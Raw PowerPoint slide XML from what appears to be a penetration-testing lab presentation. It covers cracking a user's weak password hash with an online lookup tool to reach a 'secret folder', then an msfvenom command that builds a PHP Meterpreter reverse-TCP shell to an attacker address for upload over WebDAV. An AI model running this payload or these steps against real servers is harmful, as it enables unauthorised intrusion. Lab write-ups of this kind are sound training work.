          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="23715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endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE8C394-1C2F-4906-4C6D-20F98F1BCE3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6458175" y="1538205"/>
            <a:ext cx="1886861" cy="1718191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F69106F-B1B7-DFD7-6E6A-B1D0A20D80AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6458175" y="3277915"/>
            <a:ext cx="1886861" cy="588147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77CA6783-7953-DB7B-5A56-DE339F47AF56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6458175" y="3866062"/>
            <a:ext cx="2428500" cy="29229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Exploitation: [Breaking Password Hash]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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AU" dirty="0"/>
              <a:t>http://192.168.1.105/company_folders/secret_folder/connect_to_corp_server</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p63"/>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3"/>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000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Aim is to access the secret folder using Ryan's username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Used the following website to break the hash on the account achieved in the previous step</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://crackstation.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;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37" name="Google Shape;1137;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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;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40" name="Google Shape;1140;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1" name="Google Shape;1141;p63"/>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3"/>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000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Gained access to the secret folder from previous steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered hash in file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered URL in file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Broke the hash utilising tool on the left.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Notes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Password was weak</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Password was listed in tool hashed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1144" name="Google Shape;1144;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45" name="Google Shape;1145;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1146;p63"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="23715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endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F052480F-0E49-D9D3-C887-12E2565FED6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6458175" y="1544607"/>
            <a:ext cx="2207748" cy="891295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{850B6EDC-B285-EA79-5F7B-98808390E215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6468588" y="2499135"/>
            <a:ext cx="2197335" cy="166037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Exploitation: [Establishing the Reverse Shell]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> LHOST=192.168.0.90 LPORT=4444 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="800" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p63"/>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3"/>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000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Utilise the WebDAV functionality to upload a script to the server to establish a reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
